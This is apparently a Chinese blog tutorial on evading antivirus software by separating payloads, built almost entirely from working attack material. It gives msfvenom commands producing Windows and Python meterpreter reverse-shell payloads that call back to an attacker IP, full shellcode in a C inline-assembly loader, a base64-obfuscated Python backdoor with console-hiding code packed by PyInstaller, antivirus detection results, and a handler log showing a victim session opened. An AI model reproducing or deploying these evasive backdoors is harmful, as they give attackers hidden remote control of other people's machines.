Payload分离免杀绕过杀软
杀毒软件的原理是根据特征、行为、基于云查杀,云查杀主要是根据特征码进行查杀,每一种杀毒软件都会检测头文件,所以可以进行程序段代码分离的形式,绕过当前主流杀软。
1.C语言编译后门
root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=123.56.138.161 LPORT=1234 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";
将上面的shellcode 复制下来运用内联汇编的形式编写生成.exe可执行文件。
#include <stdio.h>
#include <windows.h>
//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO") // 减小编译体积
#pragma comment(linker, "/section:.data,RWE") // 启用数据段可读写
unsigned char shellcode[] =
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";
void RunShellCode123_4()
{
__asm
{
mov eax, offset shellcode;
jmp eax;
}
}
int main(int argc, char **argv)
{
RunShellCode123_4();
return 0;
}
监听设置
root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View advanced module options with advanced
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 123.56.138.161
LHOST => 123.56.138.161
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit
[-] Handler failed to bind to 123.56.138.161:1234:- -
[*] Started reverse TCP handler on 0.0.0.0:1234
这个方法并没有实现太好的免杀效果,电脑管家刚开始没扫到,火绒直接秒杀。
2.python编译后门实现静态免杀
SMF生成payload
root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -p python/meterpreter/reverse_tcp > lhost=123.56.138.161 lport=1234 -f raw -o wk3.py
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder specified, outputting raw payload
Payload size: 433 bytes
Saved as: wk3.py
root@iZ2ze0r5hel5o5dt2w9uluZ:~# cat wk3.py
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yNS4yMy4xNjknLDEyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')[0]))root@iZ2ze0r5hel5root@iZ2ze0r5hel5o5dt2w9uluZ:~#
复制payload,加入屏蔽控制台窗口代码。
import base64,sys;
import ctypes
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
ctypes.windll.user32.ShowWindow(whnd, 0)
ctypes.windll.kernel32.CloseHandle(whnd)
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yNS4yMy4xNjknLDEyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')[0]))使用pyinstaller生成可执行程序。
没有插件的话可以 pip install pyinstaller
PS C:\Users\ASUS\Desktop> pyinstaller -F .\wk3.py
100 INFO: PyInstaller: 4.0
100 INFO: Python: 3.6.5
101 INFO: Platform: Windows-10-10.0.18362-SP0
102 INFO: wrote C:\Users\ASUS\Desktop\wk3.spec
105 INFO: UPX is not available.
107 INFO: Extending PYTHONPATH with paths
['C:\\Users\\ASUS\\Desktop', 'C:\\Users\\ASUS\\Desktop']
117 INFO: checking Analysis
117 INFO: Building Analysis because Analysis-00.toc is non existent
117 INFO: Initializing module dependency graph...
120 INFO: Caching module graph hooks...
138 INFO: Analyzing base_library.zip ...
3169 INFO: Caching module dependency graph...
3262 INFO: running Analysis Analysis-00.toc
3269 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
required by c:\users\asus\appdata\local\programs\python\python36\python.exe
3608 INFO: Analyzing C:\Users\ASUS\Desktop\wk3.py
3636 INFO: Processing module hooks...
3636 INFO: Loading module hook 'hook-encodings.py' from 'c:\\users\\asus\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\PyInstaller\\hooks'...
3724 INFO: Loading module hook 'hook-xml.py' from 'c:\\users\\asus\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\PyInstaller\\hooks'...
3979 INFO: Looking for ctypes DLLs
3980 INFO: Analyzing run-time hooks ...
3984 INFO: Looking for dynamic libraries
4077 INFO: Looking for eggs
4077 INFO: Using Python library c:\users\asus\appdata\local\programs\python\python36\python36.dll
4078 INFO: Found binding redirects:
[]
4081 INFO: Warnings written to C:\Users\ASUS\Desktop\build\wk3\warn-wk3.txt
4123 INFO: Graph cross-reference written to C:\Users\ASUS\Desktop\build\wk3\xref-wk3.html
4132 INFO: checking PYZ
4133 INFO: Building PYZ because PYZ-00.toc is non existent
4133 INFO: Building PYZ (ZlibArchive) C:\Users\ASUS\Desktop\build\wk3\PYZ-00.pyz
4642 INFO: Building PYZ (ZlibArchive) C:\Users\ASUS\Desktop\build\wk3\PYZ-00.pyz completed successfully.
4652 INFO: checking PKG
4652 INFO: Building PKG because PKG-00.toc is non existent
4652 INFO: Building PKG (CArchive) PKG-00.pkg
6198 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
6201 INFO: Bootloader c:\users\asus\appdata\local\programs\python\python36\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
6202 INFO: checking EXE
6202 INFO: Building EXE because EXE-00.toc is non existent
6202 INFO: Building EXE from EXE-00.toc
6202 INFO: Appending archive to EXE C:\Users\ASUS\Desktop\dist\wk3.exe
6211 INFO: Building EXE from EXE-00.toc completed successfully.火绒免杀
安全管家免杀
msf开启监听
root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: Use the edit command to open the currently active module in your editor
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 123.56.138.161
LHOST => 123.56.138.161
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > exploit
[-] Handler failed to bind to 123.56.138.161:1234:- -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Sending stage (53755 bytes) to 182.125.157.252
[*] Meterpreter session 1 opened (172.25.23.169:1234 -> 182.125.157.252:22104) at 2020-10-14 22:12:23 +0800
meterpreter > getuid
Server username: ASUS
meterpreter >
测试后发现python实现分离免杀是目前效果最好的,杀软认python为脚本语言,可能降低了检测强度。
2080
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
